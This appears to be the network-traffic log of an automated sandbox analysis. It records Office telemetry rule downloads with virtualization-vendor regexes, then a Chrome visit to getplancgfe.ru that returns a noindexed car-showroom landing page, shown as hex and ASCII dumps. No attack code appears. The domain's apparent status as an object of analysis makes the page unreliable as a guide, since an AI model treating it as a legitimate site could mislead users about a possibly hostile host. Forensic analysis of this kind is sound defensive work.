                                                                                        2024-11-01 12:46:53 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        85192.168.2.44984413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:53 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:53 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                        x-ms-request-id: bce63967-f01e-0071-5808-2c431c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124653Z-16ccfc49897w6rdhhC1DFWb10w00000000p000000000255f
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:53 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        86192.168.2.44984513.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:53 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:54 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                        x-ms-request-id: c82f15e6-f01e-00aa-2d36-2c8521000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124653Z-16dc884887bbfwjkhC1DFWyza800000000fg000000007b0y
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:54 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        87192.168.2.44984613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:53 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:54 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:53 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                        x-ms-request-id: 11b83051-201e-005d-1b95-2bafb3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124653Z-159b85dff8f97jn9hC1DFW19vg000000016g0000000095f4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        88192.168.2.44984913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:54 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:54 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                        x-ms-request-id: cc16d6e3-a01e-001e-1208-2c49ef000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124654Z-16ccfc498974624whC1DFWdg3800000000bg000000001m8u
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:54 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        89192.168.2.44985013.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:54 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:54 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                        x-ms-request-id: 1cb8ba43-301e-0033-2d08-2cfa9c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124654Z-16ccfc498979nn5nhC1DFWk16800000000rg000000008pn4
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:54 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        90192.168.2.44985113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:54 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:54 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:54 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 485
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                        ETag: "0x8DC582BB9769355"
                                                                                        x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124654Z-16dc884887bqz426hC1DFWhv2000000000hg000000003hkf
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:54 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        91192.168.2.449855104.21.8.814435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:54 UTC699OUTGET // HTTP/1.1
                                                                                        Host: getplancgfe.ru
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Referer: https://ecoutura.sa.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:55 UTC848INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:55 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.3.33
                                                                                        access-control-allow-origin: *
                                                                                        vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sq16g%2BoNVKnmb%2F8Wx7s97AgWy9NpMMqfHOc5IPStk5F8IE6lhTgzS4eyNvfIS%2F23GJYeSdV6g1vyeHGognea6TYqQ22mTSlaBILvJo%2BxTkJuwfoeJomIrkQCvN4e1SLxMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd888f856b13-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1720&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1277&delivery_rate=1652025&cwnd=251&unsent_bytes=0&cid=b4476cc164f761d3&ts=437&x=0"
                                                                                        2024-11-01 12:46:55 UTC521INData Raw: 31 64 34 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 6c 74 69 6d 61 74 65 20 53 75 70 65 72 63
                                                                                        Data Ascii: 1d4b<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noarchive, nosnippet, noindex, nofollow"> <title>Ultimate Superc
                                                                                        2024-11-01 12:46:55 UTC1369INData Raw: 64 79 3e 0d 0a 0d 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 62 67 2d 64 61 72 6b 20 73 74 69 63 6b 79 2d 74 6f 70 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 66 77 2d 62 6f 6c 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 65 74 70 6c 61 6e 63 67 66 65 2e 72 75 2f 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 22 3e 3c 2f 69 3e 20 55 6c 74 69 6d 61 74 65 20 53 75 70 65 72 63 61 72 20 4c 65 61 67 75 65 20 2d 20 41 75 74 6f 53 68 6f 77 72
                                                                                        Data Ascii: dy><nav class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top"> <div class="container"> <a class="navbar-brand fw-bold" href="https://getplancgfe.ru//"> <i class="fas fa-car"></i> Ultimate Supercar League - AutoShowr
                                                                                        2024-11-01 12:46:55 UTC1369INData Raw: 4b 63 65 49 61 42 4c 2d 42 42 6a 43 4a 56 65 58 72 33 52 77 48 61 45 38 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79 2d 35 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 34 20 66 77 2d 62 6f 6c 64 22 3e 44 69 73 63 6f 76 65 72 20 59 6f 75 72 20 4e 65 78 74 20 43 61 72 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 43 61 72 73 20 61 72 65 20 74 68 65 20 62 65 73 74 20 6b 69 6e 64 20 6f 66 20 74 68 65 72 61 70 79 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68
                                                                                        Data Ascii: KceIaBL-BBjCJVeXr3RwHaE8') no-repeat center; background-size: cover;"> <div class="container py-5"> <h1 class="display-4 fw-bold">Discover Your Next Car</h1> <p class="lead">Cars are the best kind of therapy.</p> <a href="h
                                                                                        2024-11-01 12:46:55 UTC1369INData Raw: 64 79 20 74 65 78 74 2d 63 65 6e 74 65 72 27 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 65 74 70 6c 61 6e 63 67 66 65 2e 72 75 2f 2f 23 69 6e 76 65 6e 74 6f 72 79 27 20 63 6c 61 73 73 3d 27 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 73 6d 27 3e 3c 69 20 63 6c 61 73 73 3d 27 66 61 73 20 66 61 2d 69 6e 66 6f 2d 63 69 72 63 6c 65 27 3e 3c 2f 69 3e 20 56 69 65 77 20 44 65 74 61 69 6c 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69
                                                                                        Data Ascii: dy text-center'> <a href='https://getplancgfe.ru//#inventory' class='btn btn-primary btn-sm'><i class='fas fa-info-circle'></i> View Details</a> </div> </div> </di
                                                                                        2024-11-01 12:46:55 UTC1369INData Raw: 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 20 64 69 73 70 6c 61 79 2d 36 20 66 77 2d 62 6f 6c 64 20 6d 62 2d 34 22 3e 4f 75 72 20 53 65 72 76 69 63 65 73 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 20 6d 62 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 74 6f 6f 6c 73 20
                                                                                        Data Ascii: tyle="background-color: #333;"> <div class="container"> <h2 class="text-center display-6 fw-bold mb-4">Our Services</h2> <div class="row text-center"> <div class="col-md-4 mb-4"> <i class="fas fa-tools
                                                                                        2024-11-01 12:46:55 UTC1369INData Raw: 64 2d 36 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 72 6f 77 73 3d 22 34 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 4d 65 73 73 61 67 65 22 20 72 65 71 75 69 72 65 64 3e 3c 2f 74 65 78 74 61 72 65 61 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: d-6"> <input type="email" class="form-control" placeholder="Email" required> </div> <div class="col-12"> <textarea class="form-control" rows="4" placeholder="Message" required></textarea>
